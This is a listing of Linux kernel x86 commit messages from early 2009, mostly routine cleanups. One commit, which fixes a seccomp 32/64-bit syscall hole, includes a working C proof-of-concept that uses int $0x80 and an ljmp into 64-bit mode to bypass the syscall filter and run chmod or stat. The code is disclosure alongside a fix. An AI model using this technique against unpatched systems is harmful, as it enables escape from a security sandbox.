1. 05 3月, 2009 3 次提交
  2. 03 3月, 2009 2 次提交
    • P
      x86: set_highmem_pages_init() cleanup · 867c5b52
      Pekka Enberg 提交于
      Impact: cleanup
      
      This patch moves set_highmem_pages_init() to arch/x86/mm/highmem_32.c.
      
      The declaration of the function is kept in asm/numa_32.h because
      asm/highmem.h is included only if CONFIG_HIGHMEM is enabled so we
      can't put the empty static inline function there.
      Signed-off-by: NPekka Enberg <penberg@cs.helsinki.fi>
      LKML-Reference: <1236082212.2675.24.camel@penberg-laptop>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      867c5b52
    • R
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath 提交于
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: NRoland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      5b101740
  3. 02 3月, 2009 4 次提交
    • J
      x86: add forward decl for tss_struct · 2fb6b2a0
      Jeremy Fitzhardinge 提交于
      Its the correct thing to do before using the struct in a prototype.
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      2fb6b2a0
    • J
      x86: unify chunks of kernel/process*.c · 389d1fb1
      Jeremy Fitzhardinge 提交于
      With x86-32 and -64 using the same mechanism for managing the
      tss io permissions bitmap, large chunks of process*.c are
      trivially unifyable, including:
      
       - exit_thread
       - flush_thread
       - __switch_to_xtra (along with tsc enable/disable)
      
      and as bonus pickups:
      
       - sys_fork
       - sys_vfork
      
      (Note: asmlinkage expands to empty on x86-64)
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      389d1fb1
    • J
      x86-32: use non-lazy io bitmap context switching · db949bba
      Jeremy Fitzhardinge 提交于
      Impact: remove 32-bit optimization to prepare unification
      
      x86-32 and -64 differ in the way they context-switch tasks
      with io permission bitmaps.  x86-64 simply copies the next
      tasks io bitmap into place (if any) on context switch.  x86-32
      invalidates the bitmap on context switch, so that the next
      IO instruction will fault; at that point it installs the
      appropriate IO bitmap.
      
      This makes context switching IO-bitmap-using tasks a bit more
      less expensive, at the cost of making the next IO instruction
      slower due to the extra fault.  This tradeoff only makes sense
      if IO-bitmap-using processes are relatively common, but they
      don't actually use IO instructions very often.
      
      However, in a typical desktop system, the only process likely
      to be using IO bitmaps is the X server, and nothing at all on
      a server.  Therefore the lazy context switch doesn't really win
      all that much, and its just a gratuitious difference from
      64-bit code.
      
      This patch removes the lazy context switch, with a view to
      unifying this code in a later change.
      Signed-off-by: NJeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      db949bba
    • I
      x86, mm: dont use non-temporal stores in pagecache accesses · f1800536
      Ingo Molnar 提交于
      Impact: standardize IO on cached ops
      
      On modern CPUs it is almost always a bad idea to use non-temporal stores,
      as the regression in this commit has shown it:
      
        30d697fa: x86: fix performance regression in write() syscall
      
      The kernel simply has no good information about whether using non-temporal
      stores is a good idea or not - and trying to add heuristics only increases
      complexity and inserts fragility.
      
      The regression on cached write()s took very long to be found - over two
      years. So dont take any chances and let the hardware decide how it makes
      use of its caches.
      
      The only exception is drivers/gpu/drm/i915/i915_gem.c: there were we are
      absolutely sure that another entity (the GPU) will pick up the dirty
      data immediately and that the CPU will not touch that data before the
      GPU will.
      
      Also, keep the _nocache() primitives to make it easier for people to
      experiment with these details. There may be more clear-cut cases where
      non-cached copies can be used, outside of filemap.c.
      
      Cc: Salman Qazi <sqazi@google.com>
      Cc: Nick Piggin <npiggin@suse.de>
      Cc: Linus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      f1800536
  4. 01 3月, 2009 1 次提交
  5. 28 2月, 2009 8 次提交
  6. 26 2月, 2009 4 次提交
  7. 25 2月, 2009 7 次提交
  8. 23 2月, 2009 4 次提交
    • I
      x86: refactor x86_quirks support · 8e6dafd6
      Ingo Molnar 提交于
      Impact: cleanup
      
      Make x86_quirks support more transparent. The highlevel
      methods are now named:
      
        extern void x86_quirk_pre_intr_init(void);
        extern void x86_quirk_intr_init(void);
      
        extern void x86_quirk_trap_init(void);
      
        extern void x86_quirk_pre_time_init(void);
        extern void x86_quirk_time_init(void);
      
      This makes it clear that if some platform extension has to
      do something here that it is considered ... weird, and is
      discouraged.
      
      Also remove arch_hooks.h and move it into setup.h (and other
      header files where appropriate).
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      8e6dafd6
    • I
      x86: remove various unused subarch hooks · d85a881d
      Ingo Molnar 提交于
      Impact: remove dead code
      
      Remove:
      
       - pre_setup_arch_hook()
       - mca_nmi_hook()
      
      If needed they can be added back via an x86_quirk handler.
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      d85a881d
    • I
      x86: remove the Voyager 32-bit subarch · 965c7eca
      Ingo Molnar 提交于
      Impact: remove unused/broken code
      
      The Voyager subarch last built successfully on the v2.6.26 kernel
      and has been stale since then and does not build on the v2.6.27,
      v2.6.28 and v2.6.29-rc5 kernels.
      
      No actual users beyond the maintainer reported this breakage.
      Patches were sent and most of the fixes were accepted but the
      discussion around how to do a few remaining issues cleanly
      fizzled out with no resolution and the code remained broken.
      
      In the v2.6.30 x86 tree development cycle 32-bit subarch support
      has been reworked and removed - and the Voyager code, beyond the
      build problems already known, needs serious and significant
      changes and probably a rewrite to support it.
      
      CONFIG_X86_VOYAGER has been marked BROKEN then. The maintainer has
      been notified but no patches have been sent so far to fix it.
      
      While all other subarchs have been converted to the new scheme,
      voyager is still broken. We'd prefer to receive patches which
      clean up the current situation in a constructive way, but even in
      case of removal there is no obstacle to add that support back
      after the issues have been sorted out in a mutually acceptable
      fashion.
      
      So remove this inactive code for now.
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      965c7eca
    • S
      x86: select x2apic ops in early apic probe only if x2apic mode is enabled · ef1f87aa
      Suresh Siddha 提交于
      If BIOS hands over the control to OS in legacy xapic mode, select
      legacy xapic related ops in the early apic probe and shift to x2apic
      ops later in the boot sequence, only after enabling x2apic mode.
      
      If BIOS hands over the control in x2apic mode, select x2apic related
      ops in the early apic probe.
      
      This fixes the early boot panic, where we were selecting x2apic ops,
      while the cpu is still in legacy xapic mode.
      Signed-off-by: NSuresh Siddha <suresh.b.siddha@intel.com>
      Cc: Yinghai Lu <yinghai@kernel.org>
      Cc: Andrew Morton <akpm@linux-foundation.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      ef1f87aa
  9. 21 2月, 2009 1 次提交
    • I
      x86, mm: rename TASK_SIZE64 => TASK_SIZE_MAX · d9517346
      Ingo Molnar 提交于
      Impact: cleanup
      
      Rename TASK_SIZE64 to TASK_SIZE_MAX, and provide the
      define on 32-bit too. (mapped to TASK_SIZE)
      
      This allows 32-bit code to make use of the (former-) TASK_SIZE64
      symbol as well, in a clean way.
      
      Cc: Linus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      d9517346
  10. 20 2月, 2009 2 次提交
  11. 19 2月, 2009 3 次提交
    • H
      x86: syscalls.h: remove asmlinkage from declaration of sys_rt_sigreturn() · 71d8f978
      Hiroshi Shimamoto 提交于
      Impact: cleanup
      
      asmlinkage for sys_rt_sigreturn() no longer exists in arch/x86/kernel/signal.c.
      Signed-off-by: NHiroshi Shimamoto <h-shimamoto@ct.jp.nec.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      71d8f978
    • J
    • K
      mm: clean up for early_pfn_to_nid() · f2dbcfa7
      KAMEZAWA Hiroyuki 提交于
      What's happening is that the assertion in mm/page_alloc.c:move_freepages()
      is triggering:
      
      	BUG_ON(page_zone(start_page) != page_zone(end_page));
      
      Once I knew this is what was happening, I added some annotations:
      
      	if (unlikely(page_zone(start_page) != page_zone(end_page))) {
      		printk(KERN_ERR "move_freepages: Bogus zones: "
      		       "start_page[%p] end_page[%p] zone[%p]\n",
      		       start_page, end_page, zone);
      		printk(KERN_ERR "move_freepages: "
      		       "start_zone[%p] end_zone[%p]\n",
      		       page_zone(start_page), page_zone(end_page));
      		printk(KERN_ERR "move_freepages: "
      		       "start_pfn[0x%lx] end_pfn[0x%lx]\n",
      		       page_to_pfn(start_page), page_to_pfn(end_page));
      		printk(KERN_ERR "move_freepages: "
      		       "start_nid[%d] end_nid[%d]\n",
      		       page_to_nid(start_page), page_to_nid(end_page));
       ...
      
      And here's what I got:
      
      	move_freepages: Bogus zones: start_page[2207d0000] end_page[2207dffc0] zone[fffff8103effcb00]
      	move_freepages: start_zone[fffff8103effcb00] end_zone[fffff8003fffeb00]
      	move_freepages: start_pfn[0x81f600] end_pfn[0x81f7ff]
      	move_freepages: start_nid[1] end_nid[0]
      
      My memory layout on this box is:
      
      [    0.000000] Zone PFN ranges:
      [    0.000000]   Normal   0x00000000 -> 0x0081ff5d
      [    0.000000] Movable zone start PFN for each node
      [    0.000000] early_node_map[8] active PFN ranges
      [    0.000000]     0: 0x00000000 -> 0x00020000
      [    0.000000]     1: 0x00800000 -> 0x0081f7ff
      [    0.000000]     1: 0x0081f800 -> 0x0081fe50
      [    0.000000]     1: 0x0081fed1 -> 0x0081fed8
      [    0.000000]     1: 0x0081feda -> 0x0081fedb
      [    0.000000]     1: 0x0081fedd -> 0x0081fee5
      [    0.000000]     1: 0x0081fee7 -> 0x0081ff51
      [    0.000000]     1: 0x0081ff59 -> 0x0081ff5d
      
      So it's a block move in that 0x81f600-->0x81f7ff region which triggers
      the problem.
      
      This patch:
      
      Declaration of early_pfn_to_nid() is scattered over per-arch include
      files, and it seems it's complicated to know when the declaration is used.
       I think it makes fix-for-memmap-init not easy.
      
      This patch moves all declaration to include/linux/mm.h
      
      After this,
        if !CONFIG_NODES_POPULATES_NODE_MAP && !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
           -> Use static definition in include/linux/mm.h
        else if !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
           -> Use generic definition in mm/page_alloc.c
        else
           -> per-arch back end function will be called.
      Signed-off-by: NKAMEZAWA Hiroyuki <kamezawa.hiroyu@jp.fujitsu.com>
      Tested-by: NKOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com>
      Reported-by: NDavid Miller <davem@davemlloft.net>
      Cc: Mel Gorman <mel@csn.ul.ie>
      Cc: Heiko Carstens <heiko.carstens@de.ibm.com>
      Cc: <stable@kernel.org>		[2.6.25.x, 2.6.26.x, 2.6.27.x, 2.6.28.x]
      Signed-off-by: NAndrew Morton <akpm@linux-foundation.org>
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      f2dbcfa7
  12. 18 2月, 2009 1 次提交
    • H
      x86: truncate ISA addresses to unsigned int · a7eb5189
      H. Peter Anvin 提交于
      Impact: Cleanup; fix inappropriate macro use
      
      ISA addresses on x86 are mapped 1:1 with the physical address space.
      Since the ISA address space is only 24 bits (32 for VLB or LPC) it
      will always fit in an unsigned int, and at least in the aha1542 driver
      using a wider type would cause an undesirable promotion.  Hence
      explicitly cast the ISA bus addresses to unsigned int.
      Signed-off-by: NH. Peter Anvin <hpa@linux.intel.com>
      Cc: James Bottomley <James.Bottomley@hansenpartnership.com>
      a7eb5189